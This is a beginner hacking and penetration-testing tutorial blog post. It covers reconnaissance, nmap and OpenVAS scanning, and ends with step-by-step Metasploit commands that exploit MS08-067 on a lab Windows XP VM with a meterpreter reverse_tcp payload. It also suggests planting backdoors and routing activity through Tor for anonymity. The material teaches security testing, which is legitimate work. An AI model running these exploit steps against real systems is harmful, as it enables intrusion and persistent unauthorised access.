• https://hicc.cs.kumamoto-u.ac.jp/~fajar/bachelor/jenesys203rdbatch.html
• https://0fajarpurnama0.tumblr.com/post/614195701382037504/jenesys-japan-east-asia-network-of-exchange-for
• https://0darkking0.blogspot.com/2020/04/jenesys203rdbatch.html
• https://0fajarpurnama0.cloudaccess.host/index.php/uncategorised/23-jenesys-japan-east-asia-network-of-exchange-for-students-and-youths-2-0-report
• http://0fajarpurnama0.weebly.com/blog/jenesys-japan-east-asia-network-of-exchange-for-students-and-youths-20-report
• https://0fajarpurnama0.wixsite.com/0fajarpurnama0/post/jenesys-japan-east-asia-network-of-exchange-for-students-and-youths-2-0-report
• http://www.teiii.cn/jenesys-japan-east-asia-network-of-exchange-for-students-and-youths-2-0-report

Table of Contents

• 0. Outline
• 1. Are you a hacker, pentester, or either?
  • 1.1 White, Grey, Black Hat, Which One Are You?
  • 1.2 Things a Pentester Might Miss
  • 1.3 Some Tools You Might Have Heard
  • 1.4 Before Proceeding
• 2. Information Gathering
  • 2.1 Preparation
  • 2.2 Conventional Way
  • 2.3 Using Tools
• 3. Scanning
  • 3.1 Port Scanning
  • 3.2 Vulnerability Scanning
• 4. Exploitation and Maintaining Access
  • 4.1 Exploitation
  • 4.2 Maintaining Access

0. Outline

The world of a true hacker is a very complex but at the same time very exciting. The materials on hacking is very big, to us first hand knowledge of networking and programming is quite necessary. It's an unheard that you have to know about the system if you want hack successfully. Unfortunately we will not go that far as the topic of this section mentioned we only let you have a taste of being a hacker. It's not expected you will be a hacker after you finish this topic, but we will like to give you the sensation of a hacker. It'll be a nice starting point if you want to be a hacker.

There are more steps than just hijacking a system, the learning objective is to know what that other steps are. We will learn a few tools used in hacking, and finally let you have a taste of exploitation and creating a malware. Basically we will:

1. Know the common 4 steps of hacking.
2. Know some famous tools in hacking.
3. Perform experiments on virtual lab.

There are some demonstration in this course, and for this be very careful since hacking or penetration testing without permission is against the law, even port scanning is considered a violation (be careful of other information gathering as well). Along the way is explained how you may conduct your experiment. Here we use an OS specifically for penetration testing for example Backtrack, Kali Linux, ArchAssault, and BackBox (it's up to you of what to use, you just need the right tool). We conduct testing on our owned PCs or virtual machines. We recommended for you learn a bit about computer network, learning programming also helps.

1. Are you a hacker, pentester, or either?

1.1 White, Grey, Black Hat, Which One Are You?

If you do a penetration testing then you're a white hat, but if you do a hacking then you're a black hat, and if you are not either, like one of the authors who is only curious. That author only wants to see whether he can break into the system, and after succeeding just leave it as it is. You only do it for fun can be categorized as gray hat. If you go further like with the purpose of destroying the system, stealing information, and other evil schemes you are categorized as black hat. The white hats on the other hand fights the black hats, they conduct penetration testing (hack) in order to find security issues on the system and fix them up. They are the good guys who had permission to test the security of a system.

If you are very new to this we suggest you give a try using Linux or similar system a bit and get used to some command lines. Hacking games like Hacker Evolution is a really nice start with not only getting used to Unix command line but gives you many pictures of being a hacker. Learning a bit about computer programming and network quite helps. You may take on this course's computer programming and networking topic first hand.

1.2 Things a Pentester Might Miss

On this course we avoid being a hacker and move to penetration testing instead. For educational purpose we want to make this as legal as possible. Both as a hacker or a pentester there are steps that needs to be consider other than exploitation. If you watch lots of action movies the exploitation process is the coolest part and applies to reality as well, but missed in showing variables that affects the probability of a successful exploitation. Without considering them it's the same thing blindly charging into the front door. Here we discussed the 4 phases in order as below and on Figure 1.1.

1. Information Gathering (some calls reconnaissance)
2. Scanning
3. Exploitation
4. Maintaining Access

There is a 5th phase which is covering your tracks, leaving no trace, or destroy the evidence, but it's consider a highly advance topic. Information gathering is like knowing where is the target, how many domains or locations does it have. Scanning sees what system the target uses, what doors are open, and how the entrances are guarded. Exploitation is without doubt the breaking process, while maintaining access is a tunnel we make to re-enter an exploited target without repeating the overall process.

There is a 5th phase which is covering your tracks, leaving no trace, or destroy the evidence, but it's consider a highly advance topic. Information gathering is like knowing where is the target, how many domains or locations does it have. Scanning sees what system the target uses, what doors are open, and how the entrances are guarded. Exploitation is without doubt the breaking process, while maintaining access is a tunnel we make to re-enter an exploited target without repeating the overall process.

1.3 Some Tools You Might Have Heard

We prefer to use Operating Systems that is already equipped with the tools we need like Kali Linux, Parrot OS, Backtrack, ArchAssault, Anonymous-OS, BackBox, Node Zero.

It's up to you but you should at least find the tools or equivalent. We will be using:

1. Information Gathering: Browser, NMAP, Whois, Dig, Nslookup, HTTrack, The Harvester, Netcraft, Host, MetaGooFil
2. Scanning: Ping, PingSweep, NMAP, Nessus, Nikto, WebSecurify
3. Exploitation: Metasploit Framework, Medussa, John The Ripper, Macof, ARP Spoof, Fast-Track Auto-PWN, Hydra
4. Maintaining Access: Netcat, Cryptcat, Netbus, Rootkits, Hacker Defender
5. Others: Virtual Machine (VMWARE, VBOX, etc), Windows XP or Lower

1.4 Before Proceeding

Simply conducting penetration testing without permission maybe regarded as hacking, and hacking is regarded as a crime. We won't stop you, but do at your own risk. Instead we recommend the followings if you want to practice:

• Prerequisites are your weapons like the OS, tools for information gathering, scanning, exploitation, etc.
• Information gathering we think mostly okay to conduct on The Internet, but beyond that is mostly illegal. Instead we can build our own target with specific OS, web server, remote, depends on what you need. If you lack hardware, you may use virtual machines (VM), or new simulators available.
• If you decided to build and experiment on your own lab, it's highly advised to isolate the network (make sure it is not accessible from the Internet).
• Don't forget not to use pirated software, (whisper: for example if you don't have legal Windows XP as target practice, install it on VM, boot and configure but never use, only for conducting penetration testing. Finally keep it to yourself, if necessary assign security layers to it so no one other than you knows its existence and can access to it).
• Just to be safe, always try to do it anonymously. For example even for information gathering using whois, ping, and nslookup, use tor network (we use torsocks), or other software that provides anonymity.

2. Information Gathering

2.1 Preparation

Since there are lots of factors to take into account like the operating system we could use, tools, targets, practice targets on VM, anonymity, etc, This page will be updated later.

2.2 Conventional Way

The information you need might be what kind of company, corporation, institution, or organization your target is, or just a group, maybe just personal. Anyway you maybe needing information like their contact info, organization structure, or just their products. This kind of information can be retrieved the conventional way:

• Newspapers
• Radio
• TV
• Magazines
• Books
• Show
• Conversation
• Advertisement

2.3 Using Tools

If you need their sites, domains, IP address, email address, are better using tools. First off we need to find their website, surf The Internet using a web browser and use search engines such as Google, Yahoo, MSN.

2.3.1 What Most Don't Know in Using Google

Turn on your computer >>> connect to The Internet >>> fire up your web browser >>> type www.google.com, that's how everyone uses it, but did you know that there are more than just that? See Figure 2.1.

• site:domain term(s) to search example: site:microsoft.com bill gates (will return information about bill gates from microsoft.com.
• allintitle:term example: allintitle:index of will return any web page that contains the key word index of.
• inurl:term example: inurl:admin will return any url that has the word admin.
• cache:mangareader.net will pull mangareader.net from Google cache (I cannot access through normal means).
• filetype:log will find log file type, filetype:pdf will file pdf file type.

2.3.2 Ping

From here on as possible we tried to use torsocks on each commands so that it will go to the tor network and render us more anonymous. Normally just do the commands without the torsocks command if you don't need to be anonymous.. Ping is a program in command line to check host alive, latency (time for a packet to reach and return), TTL, and other parameters depending the version of the program and the OS used. Figure 2.2 is an example of ping command.

2.3.3 Who is, Dig, Host, Nslookup

Dig, Host and nslookup can be used to retrieve an IP address of a website, some version is able to do viceversa. Figure 2.3 is the output of dig, host, and nslookup on metasploit.com, below that is the output of whois with much information.

#####################################################################################

root@kali:/home/fajarpurnama# torsocks whois metasploit.com



Whois Server Version 2.0



Domain names in the .com and .net domains can now be registered

with many different competing registrars. Go to http://www.internic.net

for detailed information.



   Domain Name: METASPLOIT.COM

   Registrar: MARKMONITOR INC.

   Sponsoring Registrar IANA ID: 292

   Whois Server: whois.markmonitor.com

   Referral URL: http://www.markmonitor.com

   Name Server: DELL.NS.CLOUDFLARE.COM

   Name Server: RICK.NS.CLOUDFLARE.COM

   Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited

   Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited

   Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited

   Updated Date: 25-nov-2015

   Creation Date: 10-jun-2003

   Expiration Date: 10-jun-2020



>>> Last update of whois database: Mon, 14 Dec 2015 14:06:20 GMT <<<



For more information on Whois status codes, please visit

https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.



NOTICE: The expiration date displayed in this record is the date the

registrar's sponsorship of the domain name registration in the registry is

currently set to expire. This date does not necessarily reflect the expiration

date of the domain name registrant's agreement with the sponsoring

registrar.  Users may consult the sponsoring registrar's Whois database to

view the registrar's reported date of expiration for this registration.



TERMS OF USE: You are not authorized to access or query our Whois

database through the use of electronic processes that are high-volume and

automated except as reasonably necessary to register domain names or

modify existing registrations; the Data in VeriSign Global Registry

Services' ("VeriSign") Whois database is provided by VeriSign for

information purposes only, and to assist persons in obtaining information

about or related to a domain name registration record. VeriSign does not

guarantee its accuracy. By submitting a Whois query, you agree to abide

by the following terms of use: You agree that you may use this Data only

for lawful purposes and that under no circumstances will you use this Data

to: (1) allow, enable, or otherwise support the transmission of mass

unsolicited, commercial advertising or solicitations via e-mail, telephone,

or facsimile; or (2) enable high volume, automated, electronic processes

that apply to VeriSign (or its computer systems). The compilation,

repackaging, dissemination or other use of this Data is expressly

prohibited without the prior written consent of VeriSign. You agree not to

use electronic processes that are automated and high-volume to access or

query the Whois database except as reasonably necessary to register

domain names or modify existing registrations. VeriSign reserves the right

to restrict your access to the Whois database in its sole discretion to ensure

operational stability.  VeriSign may restrict or terminate your access to the

Whois database for failure to abide by these terms of use. VeriSign

reserves the right to modify these terms at any time.



The Registry database contains ONLY .COM, .NET, .EDU domains and

Registrars.

Domain Name: metasploit.com

Registry Domain ID: 98973533_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.markmonitor.com

Registrar URL: http://www.markmonitor.com

Updated Date: 2015-11-24T21:21:32-0800

Creation Date: 2003-06-09T23:53:17-0700

Registrar Registration Expiration Date: 2020-06-09T23:53:17-0700

Registrar: MarkMonitor, Inc.

Registrar IANA ID: 292

Registrar Abuse Contact Email: abusecomplaints@markmonitor.com

Registrar Abuse Contact Phone: +1.2083895740

Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)

Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)

Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)

Registry Registrant ID: 

Registrant Name: Domain Admin

Registrant Organization: Rapid7

Registrant Street: 100 Summer Street, 13th Floor

Registrant City: Boston

Registrant State/Province: MA

Registrant Postal Code: 02110

Registrant Country: US

Registrant Phone: +1.6172471717

Registrant Phone Ext: 

Registrant Fax: +1.6175076488

Registrant Fax Ext: 

Registrant Email: domains@rapid7.com

Registry Admin ID: 

Admin Name: Domain Admin

Admin Organization: Rapid7

Admin Street: 100 Summer Street, 13th Floor

Admin City: Boston

Admin State/Province: MA

Admin Postal Code: 02110

Admin Country: US

Admin Phone: +1.6172471717

Admin Phone Ext: 

Admin Fax: +1.6175076488

Admin Fax Ext: 

Admin Email: domains@rapid7.com

Registry Tech ID: 

Tech Name: Domain Admin

Tech Organization: Rapid7

Tech Street: 100 Summer Street, 13th Floor

Tech City: Boston

Tech State/Province: MA

Tech Postal Code: 02110

Tech Country: US

Tech Phone: +1.6172471717

Tech Phone Ext: 

Tech Fax: +1.6175076488

Tech Fax Ext: 

Tech Email: domains@rapid7.com

Name Server: dell.ns.cloudflare.com

Name Server: rick.ns.cloudflare.com

DNSSEC: unsigned

URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

>>> Last update of WHOIS database: 2015-12-14T06:06:39-0800 <<<



The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for

information purposes, and to assist persons in obtaining information about or

related to a domain name registration record.  MarkMonitor.com does not guarantee

its accuracy.  By submitting a WHOIS query, you agree that you will use this Data

only for lawful purposes and that, under no circumstances will you use this Data to:

 (1) allow, enable, or otherwise support the transmission of mass unsolicited,

     commercial advertising or solicitations via e-mail (spam); or

 (2) enable high volume, automated, electronic processes that apply to

     MarkMonitor.com (or its systems).

MarkMonitor.com reserves the right to modify these terms at any time.

By submitting this query, you agree to abide by this policy.



MarkMonitor is the Global Leader in Online Brand Protection.



MarkMonitor Domain Management(TM)

MarkMonitor Brand Protection(TM)

MarkMonitor AntiPiracy(TM)

MarkMonitor AntiFraud(TM)

Professional and Managed Services



Visit MarkMonitor at http://www.markmonitor.com

Contact us at +1.8007459229

In Europe, at +44.02032062220



For more information on Whois status codes, please visit

 https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en



root@kali:/home/fajarpurnama# 

#####################################################################################
                                        

2.3.4 The Harvester

Using this tool we can find other hosts of the domains and email addresses, here we limit to 50 search and choose to connect to bing search engine, change bing to all for maximum perfomance, and see Figure 2.4.

3. Scanning

3.1 Port Scanning

As the section describes port scanning it is to see what services runs on the host. A famous tool for this is NMAP https://nmap.org. On this experiment we would like to use Windows XP as our target, the older the OS the more the vulnerability, easier to penetrate, and better practice for beginners. If you need a subject for practicing try searching a prepared vulnerable OS on The Internet [at your own risk, if you read the section of using Google for information gathering you should be aware that you can write allintitle: index of xp to search for a Windows XP image, we recommend practicing with TinyXP because it's more safer].

Anyway back to the topic we install Windows XP on Virtual Box, connected using host only adapter (you may set this adapter at file > preference), and we turn of the firewall because our version is already patched. We then use NMAP to scan the Windows XP on IP address 192.168.56.101.

• nmap --help (see help menu)
• man nmap (see documentation for nmap)
• nmap -sS 192.168.56.101.

3.2 Vulnerability Scanning

Today there tools that would do vulnerability scanning for us when usually we manually find the vulnerability. Tools that we know are Nessus and Openvas, on our OS Openvas is installed as default.

1. apt-get install openvas (if not yet installed).
2. openvas-setup (first setup, don't miss the password, username: admin. Search the web to change password if you lose it).
3. openvas-start (to start it).
4. Then open you web browser and go to url: https://127.0.0.1:9392.
5. Login, for starter just use the quick scan and insert the IP address of the target, here is 192.168.56.101.

4. Exploitation and Maintaining Access

4.1 Exploitation

More materials are coming soon, but for now we would like to do exploitation that is one of the most simple but very exciting for beginners. It's not originally simple but metasploit provided the tools for us that we just need to use. After we conduct scanning on the Windows XP on section 3, we now move to exploit Port 445 which they called netapii, SMB vulnerability.

1. msfconsole (to fired it up)
2. search smb (to find to exploit)
3. use exploit/windows/smb/ms08_067_netapi
4. show options (to see options)
5. set rhost 192.168.56.101.
6. search payload (to see payload to use)
7. set payload windows/meterpreter/reverse_tcp
8. show options
9. set lhost 192.168.56.1 (attacking PC)
10. exploit

4.2 Maintaining Access

This is possible because I turned the firewall off, what happens if we suddenly turn it on or the target patches the vulnerability (Even the latest revision of TinyXP with firewall of is not possible to exploit)? So we must insert a backdoor, trojan, virus, etc. The video will show everything from scanning to this process.